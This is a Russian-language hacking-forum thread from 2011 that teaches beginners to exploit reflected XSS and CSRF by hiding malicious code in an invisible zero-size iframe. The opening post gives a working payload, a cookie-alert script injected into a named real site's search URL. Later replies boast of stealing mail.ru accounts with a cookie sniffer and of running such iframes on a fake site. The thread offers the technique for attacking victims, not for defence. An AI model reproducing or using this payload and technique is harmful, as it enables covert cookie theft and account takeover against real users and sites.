Использование XXS в IFrame

Discussion in 'Уязвимости' started by randman, 24 Apr 2011.

  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Использование XSS в IFrame

    Для новичков.
    Если вы хотите использовать пассивную XSS, CSRF, или даже активную XSS всё это лучше делать с помощью iframe. Берёться ваш сайт, на него вставляется IFrame. А уже в Iframe вставляется весь злонамерный код.
    Пример:
    Code:
     <iframe src="http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E" width="0" height="0">XAMEHA - Форум АНТИЧАТ - 2011</iframe>
    Код не изменяет внешний вид ресурса.
     
    #1 randman, 24 Apr 2011
    Last edited: 8 Aug 2011
    2 people like this.
  2. OnlyOn

    OnlyOn Banned

    Joined:
    18 Oct 2010
    Messages:
    252
    Likes Received:
    89
    Reputations:
    36
    Прикольно так, но не ново.

    Распиши уж тогда все что можна. Как сделать iframe незаметно и т.д.
     
  3. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    я пожалуй воздержусь от критики по поводу новизны....
    единственная просьба- удалите пожалуйста следующую фразу

    не хотелось бы чтоб кто то ачат упрекнул в некомпетентности юзеров ....


    Ну а так-же XXS исправте на XSS

    По поводу POST запросов- внимательно посмотри видео http://forum.antichat.ru/thread220316.html
     
    #3 Kusto, 24 Apr 2011
    Last edited: 24 Apr 2011
  4. CodeSender:)

    CodeSender:) Elder - Старейшина

    Joined:
    29 Jul 2010
    Messages:
    245
    Likes Received:
    115
    Reputations:
    23
    Свежак...Ты просто гениален.
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Я в 2006 году так хекал мыльники mail.ru. Находил XSS на mail.ru, регал свой сайт на народе и вставлял туда сниффер. Потом кидал ссылочку жертвам.
    Но это я, думаю этот способ использовали и еще раньше.... Так что, боюсь тебя расстраивать, ты опоздал.
     
    1 person likes this.
  6. Sevak

    Sevak New Member

    Joined:
    14 Dec 2010
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Я тоже знал этот способ.На мой фейк сайте был такой IFrame
     
  7. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Чем отличается CSRF от первого поста?
    Лично я всегда думал, что cross-site request forgery (межсайтовая подделка запросов) это как раз выполнение произвольного кода на стороне клиентов, путем внедрения этого самого кода на стороннем веб-ресурсе, что собственно ты и сделал. или я ошибался?
     
    _________________________
  8. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Другого способа использования пассивных XSS, кроме описанного в этой теме, я и не представлял.
    Никогда даже мысли не возникало, что кто-то может впаривать админу прямую ссылку с XSS :confused:
    Это не троллинг, вполне серьезно.

    upd:
    XSS - это внедрение своего кода, CSRF - выполнение запросов без внедрения кода.
     
    #8 M_script, 24 Apr 2011
    Last edited: 27 Apr 2011
    1 person likes this.